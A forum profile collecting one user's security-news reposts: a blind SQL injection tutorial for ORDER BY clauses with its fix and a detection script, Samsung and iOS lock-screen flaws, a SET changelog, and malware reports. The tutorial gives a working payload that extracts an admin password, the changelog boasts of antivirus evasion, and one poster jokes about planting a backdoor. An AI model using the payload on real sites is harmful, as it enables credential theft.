Nytro

Everything posted by Nytro

  1. You have to write, in C++, a function that takes some input data (it doesn't matter what) and produces as its result a buffer (containing who knows what data, not important) whose size is unknown at the time the function is called. What would the best prototype for that function look like to you: 1. The function returns bool for success and writes the data to an address PREallocated before the call: bool Functie(int DateIntrare, char *Buffer, int &DimensiuneAlocata); The "DimensiuneAlocata" parameter is passed by reference and after the call it will hold the number of bytes used by the function. The problem is that the function may need more bytes than were preallocated, so the data will be truncated. 2. A function that returns a pointer to data ALLOCATED BY THE FUNCTION (so the user will have to free it later) and a parameter passed by reference that will hold the size of the allocated data: char *Functie(int DateIntrare, int &DimensiuneAlocata); 3. The function returns the number of bytes allocated and takes as parameter a reference to the pointer it allocates internally, with the data to be freed later by the user: int Functie(int DateIntrare, char *& Buffer); Well, there are MANY more variants. Which one do you prefer and why? I hope you understood what I mean...
  2. Other information: New! Samsung Security Flaw – Disable Lockscreen – Total Control | Terence Eden has a Blog
  3. BOPFunctionRecognition This python/jython script is used as a plugin to the BinNavi tool to analyze an x86 binary file to find buffer overflow prone functions. Such functions are important for vulnerability analysis. — Read more
Introduction:
=============
The following abstract from the original paper "Sanjay Rawat and Laurent Mounier, "Finding Buffer Overflow Inducing Loops in Binary Executables", In Proc. of the IEEE International Conference on Software Security and Reliability (SERE) 2012, June 2012, Washington DC, USA", gives the hint about this tool: Abstract—Vulnerability analysis is one among the important components of overall software assurance practice. The main aim of vulnerability analysis is to find patterns in software that indicate possible vulnerabilities. Buffer overflow (BoF) is one of such vulnerabilities that has managed to top the list of vulnerabilities. A general practice to find BoF is to look for the presence of certain functions that manipulate string buffers. strcpy family of C/C++ functions is an example of such functions. A simple analysis of such functions reveals that data is moved from one buffer to another buffer within a loop without considering destination buffer size. We argue that similar behaviour may also be present in other functions that are coded separately and therefore, are equally vulnerable. In the present report, we investigate the detection of such functions by finding loops that exhibit similar behavior. We call such loops as Buffer Overflow Inducing Loops (BOIL) mainly from buffer overflow vulnerability standpoint. We implemented our solution and analyzed it on real-world x86 binary executables. The results obtained show that this (simple but yet efficient) vulnerability pattern may provide a drastic reduction of the part of the code to be analysed, while allowing to detect real vulnerabilities.
Software Requirements:
=====================
1. BinNavi Version 4 (Note: version 3 uses MySQL databases, whereas from v4 onwards, BinNavi uses PostgreSQL)
2. IDA Pro v6
3. Jython
Installation:
============
No installation as such. In order to analyze a binary file, follow the steps:
A- Creating IDA Pro IDB file
1. Drag-n-drop the executable into the opened IDA Pro pane.
6. In the following IDA Pro window, uncheck "make imports segment" and then OK.
7. Wait until IDA Pro finishes its analysis and then close IDA Pro. It will ask to save the analysis; choose "yes".
8. The previous step will create a test.idb file in the same folder where the exe resides.
B- Importing IDB file to BinNavi
1. In Windows, go to the directory of BinNavi.
2. Double click on BinNavi.bat. It will open the BinNavi GUI.
3. In the BinNavi window, double click on the BinNavi1 DB sign (left top sidebar).
4. It will make a connection to the DB and will unfold the BinNavi1 DB field.
5. Click on "Modules" which lists all the loaded modules in BinNavi.
6. Right click on "Modules" and choose "import IDB file". It will open another window.
7. By traversing "Look in => Home (symbol)", go to the folder and select the test.idb file and then press the ">>" sign. Click import.
8. Once imported, test.exe will appear in the "Module" tree. Double click on this.
8. This will open another window, which has the functions defined in the module (lower right pane). By double clicking on any function address, you can open this function's graph. This step is not required for our purpose, i.e. for the API based script.
9. Just run the provided script as > jython BOPFunctionRecognition_simple.py and follow the instructions thereafter.
The output of the script is two files: 1. a file with results describing the functions that are BOP functions along with loop information (at assembly level) 2. a pickle file that has a list of BOP functions.
NOTE:
=====
The provided script is absolutely an unoptimized version and there are many things that can be improved a lot (both code and algorithm wise). We'll be updating it from time to time and also anticipate volunteers to suggest. Please write me mails if you would like to participate or contribute. Thanks Sanjay Rawat sanjayr@ymail.com
Download: https://github.com/tosanjay/BOPFunctionRecognition
  4. Linux community adopts UEFI technology The Unified Extensible Firmware Interface (UEFI) Forum, a world-class, non-profit industry standards body of leading technology companies that promotes firmware innovation by creating specifications that enable the continual evolution of platform technologies, is gaining momentum as use of UEFI specifications increases in Linux-based operating systems, such as Ubuntu 12.10, Fedora 18 and OpenSUSE 12.3. UEFI specifications enable cross-functionality between devices, software and systems. By design, UEFI technology lends itself to utility and applicability across a range of platforms. Including UEFI Secure Boot in Linux-based distributions allows users to boot alternate operating systems without disabling UEFI Secure Boot. It also allows users to run the software they choose in the most secure and efficient way possible, promoting interoperability and technical innovation. UEFI specifications are designed to enhance security and standardization while allowing a speedier boot time. Companies responsible for delivering backup and disaster recovery for servers, desktops, laptops and virtual machines rely on robust UEFI technology to ensure crucial data remains protected under all circumstances. In the event of a system outage, use of UEFI technology reduces downtime and loss of revenue. “The increasing use of UEFI technology in Linux and proprietary systems is a testament to its ability to deliver next-generation technologies for nearly any platform,” said Mark Doran, president, UEFI Forum. “It’s exciting to watch UEFI enable the evolution of firmware technology in a variety of sectors as it continues to gain momentum.” Source: Linux community adopts UEFI technology
  5. It's the best: with a single click, if the site is vulnerable, it shows you the administrators' login details.
  6. [h=2]PHP Security – Escape proof SQL injection in ORDER BY clause[/h] http://xkcd.com/327/ It’s a well known, well documented, and well abused fact that SQL injection attacks can take place in the WHERE clause of a SQL statement. The commonly applied practice among professionals is to run user input through mysql(i)_real_escape_string(). However, this only protects against user variables within quoted values, and does not protect against SQL injection attacks elsewhere in the query. One place that is commonly vulnerable is in the ORDER BY clause. Many developers either do not understand that mysql(i)_real_escape_string does not protect them from these types of attacks, or do not think that meaningful SQL injection can be done at this point in the query on a single statement engine like MySQL. As a result, this vulnerability can be found and exploited in many applications and websites, both commercial and open source, personal and corporate. The vulnerable code and SQL query are basically:
<?php
$sortColumn = mysqli_real_escape_string($_GET['sort_column']);
$query = "SELECT * from some_table WHERE active = true ORDER BY $sortColumn DESC";
?>
This is vulnerable to a SQL injection attack that will allow a hacker to get information from any table in the database, whether it’s usernames, passwords, credit card account numbers, etc.
[h=2]How this can be exploited[/h] The core theory behind the exploit is that this vulnerable query allows you to test a tiny piece of information from anywhere in the database in a boolean query that doesn’t rely on any unescaped characters, then use the value of that boolean to visibly change the output of the query. Assume that the vulnerable site is a news site and lets you sort the article listings by the date or title column. When you click on the column header you want to sort by, it sends a ‘sort_column’ parameter to the above script of either ‘date’ or ‘title’. If instead of sending ‘date’ or ‘title’, you sent something like the following string, you would be able to start reading information from anywhere in the database. In this particular case, we’ll try the users table.
(CASE WHEN (SELECT ASCII(SUBSTRING(password, 1, 1)) FROM users where username = 0x61646D696E) = 65 THEN date ELSE title END)
Assuming that these are the correct table and column names, this injection will allow you to tell whether or not the first character of the admin user’s password is ‘A’. If it is, the article list will be returned sorted by date. If not, it will be returned sorted by title. If it isn’t a match, then the 65 in the query just needs to be incremented/decremented until the match is made to try other various letters/symbols. Once the match is made and the first character is discovered, the substring offset just needs to be incremented to get the second character, but this time starting with null to see if the end of the string has already been reached. If not, start back at 65, and repeat the process until null matches. This does require some knowledge about the database schema, which can be guessed, looked up in open source applications, or learned by first querying against a known table like the information schema. A script can be written to automate this process very quickly, as an 8 character password with upper and lowercase letters and numbers can be discovered with a maximum of 500 queries. MD5 encoded passwords will have the hashes revealed in less than 512 queries, which can then be brute force decoded (at over 500 million attempts/second, thanks to GPU computing), or directly looked up if the password is a common word or phrase.
[h=2]Why This Works[/h] Because each of these queries puts user input in a place in the query that is not enclosed with ‘, there is no need to use any of the characters that would be escaped by mysql(i)_real_escape_string(). Instead, SQL can be passed directly into the query. In places where strings are normally used when making a query, hex notation, ASCII or other character conversion can be used to convert strings to or from their numeric values. As demonstrated in these examples, anywhere that SQL can be injected into a query is a major security vulnerability.
[h=2]How to Secure[/h] Securing this type of query is a rather simple process. If a column name is expected, the user input should be validated against a whitelist array. Applying this to the example query:
<?php
$columns = array( 'title', 'date' );
if (in_array($_GET['sort_column'], $columns)) {
    $sortColumn = $_GET['sort_column'];
} else {
    $sortColumn = 'title';
}
?>
As you can see, the above code will ensure that only expected/allowed values make it through to the database. So remember, trust no one, and sanitize everything, regardless of how harmless you may think invalid input will be. Source: Joseph Keeler
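An added example (not from the article or its author) that puts the two points above side by side in Python: a reimplementation of the character set mysql_real_escape_string() rewrites, which leaves the article's CASE WHEN payload untouched, next to an allow-list lookup that can only ever emit a known column name, plus a check over constructed access-log lines that flags sort_column values outside the allow-list, which is the detection a defender wants while the vulnerable code is still deployed. Table and column names are the article's; the log lines and the `/news` path are constructed here.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Characters MySQL's mysql_real_escape_string() rewrites: NUL, backslash,
# single and double quote, newline, carriage return, Ctrl-Z. Reimplemented
# only to show what the function does and does not touch.
_ESCAPES = {
    "\0": "\\0", "\\": "\\\\", "'": "\\'", '"': '\\"',
    "\n": "\\n", "\r": "\\r", "\x1a": "\\Z",
}


def mysql_real_escape_string(value: str) -> str:
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


# The article's blind-injection payload: no quotes, no backslashes, nothing
# the escaping function would rewrite. 0x61646D696E is hex for "admin".
PAYLOAD = (
    "(CASE WHEN (SELECT ASCII(SUBSTRING(password, 1, 1)) FROM users "
    "where username = 0x61646D696E) = 65 THEN date ELSE title END)"
)


def build_query_escaping_only(sort_column: str) -> str:
    """The vulnerable pattern: escape, then interpolate into ORDER BY."""
    return (
        "SELECT * FROM some_table WHERE active = true "
        f"ORDER BY {mysql_real_escape_string(sort_column)} DESC"
    )


# Allow-list: maps the token the client may send to the identifier that is
# actually emitted. Anything not in the dict falls back to the default.
ALLOWED_SORT_COLUMNS = {"title": "title", "date": "date"}
DEFAULT_SORT_COLUMN = "title"


def build_query_allowlisted(sort_column: str) -> str:
    """The hardened pattern: only a dict value can ever reach the query."""
    column = ALLOWED_SORT_COLUMNS.get(sort_column, DEFAULT_SORT_COLUMN)
    return f"SELECT * FROM some_table WHERE active = true ORDER BY {column} DESC"


def escaping_changed_payload() -> bool:
    """True if escaping altered the payload at all (it does not)."""
    return mysql_real_escape_string(PAYLOAD) != PAYLOAD


# Constructed access-log lines (Apache combined format, shortened). The second
# line carries the URL-encoded payload as a sort_column parameter.
SAMPLE_LOG = [
    '10.0.0.7 - - [20/Mar/2013:10:15:01 +0000] "GET /news?sort_column=date HTTP/1.1" 200 5120',
    '10.0.0.7 - - [20/Mar/2013:10:15:03 +0000] "GET /news?sort_column=(CASE+WHEN+(SELECT+ASCII(SUBSTRING(password,1,1))+FROM+users+WHERE+username%3D0x61646D696E)%3D65+THEN+date+ELSE+title+END) HTTP/1.1" 200 5120',
    '10.0.0.9 - - [20/Mar/2013:10:16:40 +0000] "GET /news?sort_column=title HTTP/1.1" 200 5120',
]

_REQUEST_RE = re.compile(r'"GET (\S+) HTTP/')


def flag_sort_probes(lines):
    """Return the decoded sort_column values that are outside the allow-list."""
    hits = []
    for line in lines:
        match = _REQUEST_RE.search(line)
        if not match:
            continue
        params = parse_qs(urlsplit(match.group(1)).query)
        for value in params.get("sort_column", []):
            if value not in ALLOWED_SORT_COLUMNS:
                hits.append(value)
    return hits


if __name__ == "__main__":
    print("escaping changed payload:", escaping_changed_payload())
    print(build_query_escaping_only(PAYLOAD))
    print(build_query_allowlisted(PAYLOAD))
    print("probes:", flag_sort_probes(SAMPLE_LOG))
```

The same allow-list approach applies to any identifier position (column, table, sort direction), since escaping is defined for string literals only.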
  7. [h=2]Social-Engineer Toolkit (SET) v4.7 – Codename “Headshot” Released.[/h] The Social-Engineer Toolkit (SET) version 4.7 codename “Headshot” has been released. This version of SET introduces the ability to specify multi-powershell injection which allows you to use as many ports as you want. SET will automatically inject PowerShell onto the system on all of the reverse ports outbound. What’s nice with this technique is it never touches disk and also uses already whitelisted processes. So it should never trigger anything like anti-virus or whitelisting/blacklisting tools. In addition to multi-powershell injector, there are a total of 30 new features and a large rewrite of how SET handles passing information within different modules. Changelog:
~~~~~~~~~~~~~~~~
version 4.7
~~~~~~~~~~~~~~~~
* removed a prompt that would come up when using the powershell injection technique, port.options is now written in prep.py versus a second prompt with information that was already provided
* began an extremely large project of centralizing the SET config file by moving all of the options to the set.options file under src/program_junk
* moved all port.options to the central routine file set.options
* moved all ipaddr.file to the central routine file set.options
* changed spacing on when launching the SET web server
* changed the wording to reflect what operating systems this was tested on versus browsers
* removed an un-needed print option1 within smtp_web that was reflecting a message back to user
* added the updated java bean jmx exploit that was updated in Metasploit
* added ability to specify a username list for the SQL brute forcing, can either specify sa, other usernames, or a filename with usernames in it
* added new feature called multi-powershell-injection – configurable in the set config options, allows you to use powershell to do multiple injection points and ports. Useful in egress situations where you don’t know which port will be allowed outbound.
* enabled multi-pyinjection through java applet attack vector, it is configured through set config
* removed check for static powershell commands, will load regardless – if not installed user will not know regardless – better if path variables aren’t the same
* fixed a bug that would cause linux and osx payloads to be selected even when disabled
* fixed a bug that would cause the meta_config file to be empty if selecting powershell injection
* added automatic check for Kali Linux to detect the default moved Metasploit path
* removed a tail comma from the new multi injector which was causing it to error out
* added new core routine check_ports(filename, ports) which will do a compare to see if a file already contains a metasploit LPORT (removes duplicates)
* added new check to remove duplicates into multi powershell injection
* made the new powershell injection technique compliant with the multi pyinjector – both payloads work together now
* added encrypted and obfuscated jar files to SET, will automatically push new repos to git everyday.
* rewrote the java jar file to handle multiple powershell alphanumeric shellcode points injected into applet.
* added signed and unsigned jar files to the java applet attack vector
* removed create_payload.py from saving files in src/html and instead in the proper folders src/program_junk
* fixed a payload duplication issue in create_payload.py, will now check to see if port is there
* removed a pefile check unless backdoored executable is in use
* turned digital signature stealing from a pefile to off in the set_config file
* converted all src/html/msf.exe to src/program_junk/ and fixed an issue where the applet would not load properly
Download: https://www.trustedsec.com/downloads/social-engineer-toolkit/
Source: https://www.trustedsec.com/march-2013/social-engineer-toolkit-set-v4-7-codename-headshot-released/
  8. + St. Patrick’s Day Through Google Glass | Google Glass APPs
  9. [h=2]How Guys Will Use Google Glass[/h] Once Google Glass does not require voice recognition and is completely discreet then, and only then, will the true creepsters embrace said technology. Until that time, they’ll only begrudgingly embrace it. Source: How Guys Will Use Google Glass | Technology | Dueling Analogs - Video
  10. Advanced Heap Manipulation in Windows 8, by Zhenhua (Eric) Liu, zhliu@fortinet.com, version 1.0. Contents:
Abstract
Prior Works
Introduction: Sandbox; Windows 8 Kernel Exploit mitigation improvements; Heap feng shui and Windows 8; What Feng shui really is; What’s left? (Uninitialized memory reference, Application specific attacks, Custom Memory Allocator); The future
Quick View of the Idea: Basics (Freelists, Three ways could write into the FreeLists, Allocation Search, Splitting Pool Chunks process); The Mandatory Search Technique
Kernel Pool: Implementation in Kernel Pool (Basics, Reliability Notes, Putting It All Together)
User Heap: Implementation in User Heap (Applicable circumstance, Prerequisites, The simple idea); Practices in User heap (A practical attack on _HEAP_USERDATA_HEADER, Uninitialized memory reference, Practical heap determining in IE 10)
Conclusion
Acknowledgements
Bibliography
Attacking _HEAP_USERDATA_HEADER Source Code
Download: https://media.blackhat.com/eu-13/briefings/Liu/bh-eu-13-liu-advanced-heap-WP.pdf
  11. [h=1]Chameleon – a botnet with a financial impact of 6 million dollars a month[/h] Published by Andrei Avădănei in Security · News — 20 Mar, 2013 at 2:49 pm Chameleon is a botnet discovered by spider.io, the research coming very shortly after the takedown of the Bamital botnet by Microsoft and Symantec on 6 February 2013. Chameleon stands out for its extremely large financial impact, with estimated costs for advertisers of over 6 million dollars a month, 70% more costly than the Bamital botnet. Also notable is that the ads Chameleon places are very large, unlike the text links in the previous case. Chameleon runs algorithms of varying complexity to manage the ads in a way as close as possible to the theme of the sites being accessed. The level of sophistication and the mechanisms for evading detection systems are very impressive. The computers Chameleon runs on are machines with Microsoft Windows as the operating system. The infected computers access the web through a Trident browser with Flash enabled that executes JavaScript. So far over 120,000 infected machines have been identified, 95% of them with US IPs. More details on this subject can be found on spider.io. — Andrei Avădănei Source: Chameleon – o rețea botnet cu impact financiar de 6 milioane de dolari lunar | WorldIT
  12. [h=1]New Samsung flaw allows 'total bypass' of Android lock screen[/h] Summary: Another day, another lock screen flaw. Some Samsung devices running Android 4.1.2 can allow a 'total bypass' of the device's lock screen. By Zack Whittaker for Zero Day | March 20, 2013 -- 12:10 GMT (05:10 PDT) Another security flaw has been discovered on some Samsung phones that allows complete access to a device. Discovered by the same mobile enthusiast as the previous flaw, Terence Eden warns that this new bug could allow users to bypass the lock screen entirely through the use of third-party apps. This affects pattern unlocks, PIN code screens, and face detection security. The flaw was tested on a Samsung Galaxy Note II running Android 4.1.2 as before — but it does not appear to exist on stock Android from Google, suggesting this is limited to Samsung phones only. This flaw may exist in other Android phones, notably Samsung devices, and users and IT managers alike should test their devices immediately. The method involves many of the same steps as before, and involves having direct access to the device. Also, the methodology may include repeating some steps, so by far this is not an easy way to gain unauthorized access to a Samsung device. From the lock screen, an attacker can enter a fake emergency number to call which momentarily bypasses the lock screen, as before. But if these steps are repeated, the user has enough time to go into the Google Play application store and voice search for "no locking" apps, which then disables the lock screen altogether. From there, the device is left wide open. Here's the video: Eden said that he disclosed this to Samsung in late February, but unlike last time, the Korean giant responded. A software fix to this lock screen bypass will be "released shortly," according to Eden. It comes only a few weeks after a similar flaw was discovered in the lock screen of Apple's iPhone in iOS 6.1. This was fixed on March 19, more than a month after it was first discovered. Samsung did not fix the original lock screen bug, leaving millions of devices potentially at risk from privacy invasion. More worryingly, now a similar flaw can open up the device completely. For now, only a third-party ROM can prevent such attacks. According to Eden, one software ROM designed for the Galaxy S III claims to have fixed the problem. Source: New Samsung flaw allows 'total bypass' of Android lock screen | ZDNet
  13. Exploiting Software: How to Break Code. By Greg Hoglund and Gary McGraw. Publisher: Addison Wesley. Pub Date: February 17, 2004. ISBN: 0-201-78695-8. Pages: 512. How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers. Exploiting Software is loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out. This must-have book may shock you—and it will certainly educate you. Getting beyond the script kiddie treatment found in many hacking books, you will learn about: why software exploit will continue to be a serious problem; when network security mechanisms do not work; attack patterns; reverse engineering; classic attacks against server software; surprising attacks against client software; techniques for crafting malicious input; the technical details of buffer overflows; rootkits. Download: http://par-anoia.net/assessment/books/security/Exploiting Software - How to Break Code - G. Hoglund, et al., (Addison-Wesley, 2004) WW.pdf
  14. The Government organizes the first Hackathon in Romania Topic: Wednesday, 20 February 2013 This weekend, the Government's headquarters becomes the venue of the first "programming marathon" in Romania – Hackathon. Thus, for two days, 28 pupils will develop applications, web pages and interfaces with the help of Bitdefender and Microsoft, the event's partners, in an attempt to bring the public administration closer to the citizen and to hold those who govern accountable through openness and transparency. The five projects developed during this marathon centralize information of public interest. They will be:
• Buget.gov.ro – data on the state budget and its visualization in an easy-to-understand form
• Angajati.gov.ro – data on public administration employees
• Posturi.gov.ro – data on vacant positions put up for competition in the public administration
• Petitii.gov.ro – citizens' initiatives, by area of interest
• Data.gov.ro – facilitates public access to the data included in the platforms above
This first edition will be attended by pupils with very good results in computer science competitions, selected by the Ministry of Education. Source: Guvernul organizeaza primul Hackathon din Romania So: 1. Programmers are expensive, so we get some kids to work for us, drawn in by the term "hackathon" (which is obviously used incorrectly) 2. We complain that government sites are vulnerable to any crap and that Vasile puts "Your mom's fat" on the homepage PS: If they give us pizza and beer I might go too. PS 2: I'm thinking of going and leaving a backdoor there as well. (I won't give you any more ideas)
  15. [h=3]Owning Samsung phones for fun (...but with no profit )[/h]I was planning to open a blog since some months, but I decided to do it only now, to summarize some of the findings of a quick look I gave at a couple of Samsung Android devices. But let's start at the beginning. During last Christmas holidays I finally had some free time to try to better understand the inner workings of some Samsung devices, focusing on the manufacturer's customizations to the Android system. I confess I was quite surprised to see how many Samsung applications are included in the original firmware image, including several customizations to lots of Android core packages. To make a long story short, I soon started to find some exploitable bugs, affecting both "old" device models (e.g., my Galaxy Tab GT-P1000) and newer devices (e.g., my Galaxy S3). All these issues were caused by Samsung-specific software or customizations. I must say I have nothing against Samsung: on the contrary I'm a happy Samsung customer, and I think their phones and tablets are quite cool, probably among the best devices around. However, their market share is making them an attractive target for attackers. I contacted Samsung at the beginning of January 2013, and on January 17th I gave them all the technical details and proof-of-concepts for the six vulnerabilities I found, plus some bonus denial-of-services and info leaks (for the sake of completeness, the MD5 of my report is af7ca8998079c5445a3b1bcff2e05f90). Since then, I have not received any official confirmation from Samsung about their intention to fix these issues: as far as I know, they are still "in the process of checking for the vulnerabilities". Despite this fact, on February 20th, they asked to delay my public disclosure until proper patches are developed, considering that "any patches [samsung] develops must first be approved by the network carriers". 
In the past, I have always followed a responsible disclosure policy to report the vulnerabilities I have found, but waiting until (all?) the network carriers approve a security patch seems to be a very, VERY, long time! Nevertheless, to avoid exposing Samsung users to possible threats, I won't disclose any technical detail, but I think it is acceptable to provide just a high-level overview of the issues.

Scenario

All the vulnerabilities I reported can be exploited from an unprivileged local application. In other words, no specific Android privileges are required for the attacks to succeed. This allows attackers to conceal the exploit code inside a low-privileged (and apparently benign) application, distributed through Google Play or the Samsung Apps market. I would like to stress one more time that these issues are not caused by bugs inside the "vanilla" Android system, but are all caused by Samsung-specific software and customizations.

Issues overview

As I discussed before, no technical details will be provided. In this paragraph I will just sketch out a high-level description of the issues I found and their possible impacts.

1. Two different vulnerabilities can be exploited to silently install highly-privileged applications with no user interaction. The privileged applications to be installed can be embedded right inside the unprivileged application package, or downloaded "on the fly" from an on-line market.
2. Another issue, different from the previous ones, allows attackers to send SMS messages without requiring any Android privilege (normally, Android applications are required to have the android.permission.SEND_SMS permission to perform this task).
3. An additional vulnerability can be used to silently perform almost any action on the victim's phone, ranging from placing phone calls to sending e-mails, SMS messages, and so on.
4. The remaining security issues allow attackers to change other settings of the victim's phone, such as networking or Internet settings, without the user's consent.

Proof-of-concept

A video that shows the exploitation of one of the issues discussed at point 1 (stealth installation of a privileged application) is shown below. I know the video is quite meaningless, but it is all I can disclose right now. I'm also sorry for the poor video quality, but it turned out that recording an Android screen video with a good fps rate is more difficult than finding 0-days. The video was taken using my Samsung Galaxy Tab, updated with the latest Samsung firmware and applications available at the time of writing. A similar vulnerability (but not the very same one) also affects the Galaxy S3 and probably other more recent devices.

The video is organized as follows:

1. An application named "Hacksung" is installed on the target device. At the beginning of the video I show that "Hacksung" has no specific permissions.
2. Application "Hacksung" is executed and the exploit is launched when the "Pwn!" button is pressed. The exploit installs a second app, named "Malicious", embedded inside the "Hacksung" application package. As you can see from the video, no user confirmation is requested.
3. The application "Malicious" is run. This application does nothing, and it simply displays a text message.
4. To conclude, the video shows the permissions granted to "Malicious". As can be seen, several dangerous permissions are granted, such as the ability to read and send SMS messages.

Some final observations

The ability to silently install privileged applications or to send SMS messages are quite appealing tasks for mobile malware authors and, to make things even worse, most of the issues I reported to Samsung are also pretty easy to find. As a consequence, I won't be surprised to find some malware in the wild that exploits these or similar vulnerabilities.
Considering that most of these bugs can be fixed quite easily, without any drastic change to the device software, I admit that I was expecting a quick patch from Samsung. However, two months were not enough even to start the development of a security fix, and I don't think any patch will be released anytime soon. I really think Samsung cares about the security of its customers, but probably its vulnerability handling procedure should be revised a little bit.

Smartphones, tablets and other portable devices are tomorrow's computing platform, and Android is one of the leading actors of this change. As a natural consequence, Android malware is also rapidly growing. In this situation, the prompt development and diffusion of security patches is simply mandatory.

Source: Roberto Paleari's blog: Owning Samsung phones for fun (...but with no profit)
  16. Hash Generator

Hash Generator is the FREE universal hash generator tool which automates the generation of 14 different types of hashes or checksums. It supports most of the popular hashes including the MD5 family, SHA family, BASE64, LM, NTLM, CRC32, ROT13, RIPEMD, ADLER32, HAVAL, WHIRLPOOL etc.

It can even generate the hash for a file as well as for text input. The user can directly enter or paste any text from the clipboard and generate its hash. It also supports a 'Drag & Drop interface' which allows you to quickly drag files onto the tool for hash generation.

Hashes or checksums are mainly used for file integrity verification. Often files downloaded from the Internet are checked with an MD5/SHA256 hash to make sure the file has not been tampered with. Hashes are also used in encryption and in the storage of passwords and other sensitive data, to protect them from prying eyes. HashGenerator helps in quickly computing or verifying the hash for any such file or password text.

It works on a wide range of platforms, from Windows XP to the latest operating system, Windows 8.

http://www.youtube.com/watch?v=ImBdB0aPjMs&feature=player_embedded

Download: http://securityxploded.com/download.php#hashgenerator

Source: Hash Generator : All-in-one Tool to Generate Hash MD5/SHA1/SHA256/SHA512/BASE64/LM/NTLM/CRC32 | www.SecurityXploded.com
  17. Apple's New iOS Update Blocks Evasi0n Jailbreak--After It's Been Used About 18 Million Times

After 43 days of jailbreaking frenzy, Apple has closed the cell doors again. The latest 6.1.3 update to iOS released Tuesday includes a patch that prevents the use of the hacking tool evasi0n, which since early February has become the most popular program ever for “jailbreaking” phones and tablets to remove their software restrictions.

David Wang, one of the four hackers who created evasi0n, confirms that the new update includes a patch for a bug in iOS’s time zone settings, one of a series of vulnerabilities that allowed users to dismantle the iPhone’s and iPads’ considerable security measures. Wang first spotted the bug fix in the beta version of the update released to developers last month.

Update: In fact, Apple writes in notes accompanying the update that it has fixed six bugs in total, and graciously credits the hackers behind evasi0n with making the company aware of four of them.

In the six weeks since evasi0n was released, however, close to 18 million devices have already been jailbroken, according to data from Jay Freeman, the administrator of the Cydia app store for jailbroken devices. He says he’s counted 18.2 million unique devices running iOS 6 visiting Cydia, including 13.8 million iPhones, 3.4 million iPads, and 1.1 million iPod Touches. Those numbers vastly exceed previous jailbreaks such as Jailbreakme 3, a popular hacking tool for iOS released in the summer of 2011 that was used on around 2 million devices, according to a count at the time by creator Nicholas Allegra.

Aside from blocking evasi0n, the update also fixes a bug in iOS that let anyone bypass an iPhone’s lockscreen using its emergency call function, allowing partial access to the phone’s private data and even allowing calls to be made.

Compared to some previous jailbreaks, Apple took its time in patching evasi0n.
By contrast, the company took only nine days to fix the bugs exploited by Jailbreakme 3. But that tool allowed anyone to jailbreak his or her phone or tablet simply by visiting a website, creating the risk that it would be repurposed by malicious hackers to perform “drive-by downloads” of malware onto Apple devices that visited an infected website. Evasi0n, on the other hand, requires a USB connection between the device being jailbroken and a PC, vastly reducing the risk that it could be used for malicious purposes. “If there’s no injection vector they know about that lets you activate the attack through drive-by, [Apple doesn't] seem to put much priority on it,” says Wang.

Wang says that at least one of the bugs used in evasi0n remains in Apple’s mobile operating system. And he’s told me previously that the hacker team who cooperated on evasi0n, known as the evad3rs, has a backup supply of secret bugs in iOS that they’re saving for future jailbreak tools. It’s unclear how many of those bugs might be patched in iOS 6.1.3. But for now, anyway, they don’t plan to waste them on creating a new tool. “We’ll probably wait until the next major release,” says Wang.

That means any user who updates to iOS 6.1.3 will lose the ability to jailbreak his or her phone for months or possibly years to come. But Wang says there’s still no fix available to jailbreakers for the lockscreen vulnerability that’s also patched in this update. So any jailbreak fan who forgoes Apple’s latest update should also take extra care not to let their phone out of their sight.

Source: Apple's New iOS Update Blocks Evasi0n Jailbreak--After It's Been Used About 18 Million Times - Forbes
  18. Puzzle box: The quest to crack the world’s most mysterious malware warhead

State-sponsored Gauss contains secret warhead eluding global cracking experts.

by Dan Goodin - Mar 14 2013

It was straight out of your favorite spy novel. The US and Israel felt threatened by Iran's totalitarian-esque government and its budding nuclear program. If this initiative wasn't stopped, there was no telling how far the growing conflict could escalate. So militaries from the two countries reportedly turned to one of the most novel weapons of the 21st century: malware. The result was Stuxnet, a powerful computer worm designed to sabotage uranium enrichment operations. When Stuxnet was found infecting hundreds of thousands of computers worldwide, it was only a matter of time until researchers unraveled its complex code to determine its true intent.

Today, analysts are up against a similar challenge. But they're finding considerably less success taking apart the Stuxnet cousin known as Gauss. A novel scheme encrypting one of its main engines has so far defied attempts to crack it, generating intrigue and raising speculation that it may deliver a warhead that's more destructive than anything the world has seen before.

Gauss generated headlines almost immediately after its discovery was documented last year by researchers from Russia-based antivirus provider Kaspersky Lab. State-of-the-art coding techniques that surreptitiously extracted sensitive data from thousands of Middle Eastern computers were worthy of a James Bond or Mission Impossible movie. Adding to the intrigue, code signatures showed Gauss was spawned from the same developers responsible for Stuxnet, the powerful computer worm reportedly unleashed by the US and Israeli governments to disrupt Iran's nuclear program. Gauss also had links to the highly advanced Flame and Duqu espionage trojans.
Gauss contains module names paying homage to the German mathematicians and scientists Johann Carl Friedrich Gauss, Kurt Friedrich Gödel, and Joseph-Louis Lagrange. Its noteworthy features only start there.

Gauss has the ability to steal funds and monitor data from clients of several Lebanese banks, making it the first publicly known nation-state sponsored banking trojan. It's also programmed to collect a dizzying array of information about the computers it infects—including its network connections, processes and folders, BIOS, CMOS, RAM, and both local and removable drives.

But the most intriguing characteristic of Gauss is an encrypted payload that has so far remained undeciphered, despite the best efforts of cryptographers who have already tried millions of possible keys. Tucked deep inside the Gödel module, the secret warhead is loaded onto USB sticks and removable drives when they're connected to Gauss-infected machines. When the drives are plugged into an uninfected computer later, the mysterious code is executed—but only if it encounters the specific machine or machines targeted by the Gauss developers. On every other computer, the module remains cloaked in an impenetrable envelope that prevents researchers and would-be copycats from reverse engineering the code.

The extreme stealth has stoked speculation that the payload may contain a potent exploit that could rival the Stuxnet attack that was bent on destroying uranium centrifuges inside Iran's high-security Natanz enrichment facility. Certainly not your everyday malware.

"Considering the link with Flame and Stuxnet, the payload of Gauss must be of similar magnitude," Costin Raiu, director of Kaspersky Lab's global research and analysis team, told Ars. "Given how careful the attackers were to make sure the Gauss payload doesn't fall into the 'wrong' hands, we can assume it is very special."

[Figure: The Gauss architecture. Kaspersky Lab]

Built to last

